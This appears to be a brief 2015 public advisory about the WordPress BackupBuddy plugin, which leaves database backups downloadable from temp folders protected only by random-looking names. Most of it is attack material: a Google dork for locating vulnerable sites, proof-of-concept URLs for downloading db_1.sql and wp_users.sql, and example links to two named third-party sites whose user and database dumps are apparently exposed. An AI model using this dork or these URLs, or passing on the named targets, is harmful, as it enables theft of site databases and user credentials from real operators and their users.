WordPress BackupBuddy plugin fails to adequately protect backups by simply putting them in directories with "random" names.
bb5c83dc3038bf99d5347a8647f2270272a80adbaf296f0aea47befd5052334b
# WordPress 'BackupBuddy' Plugin Exposure Backup File to Unauthorized Control
# CWE: CWE-530
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage: https://ithemes.com/purchase/backupbuddy/
# Google Dork: inurl:/wp-content/uploads/backupbuddy_temp/
# PoC :
http://SITE.COM/wp-content/upload/backupbuddy_temp/"RANDOM NAME"/db_1.sql OR
http://SITE.COM/wp-content/upload/backupbuddy_temp/"RANDOM NAME"/wp_users.sql
# Examples:
http://intouchhome.com/wp-content/uploads/backupbuddy_temp/rollback_nwb0cpc4r6/wp_users.sql
http://www.article2range.com/wp-content/uploads/backupbuddy_temp/61fmr70xk7/db_1.sql
And Others...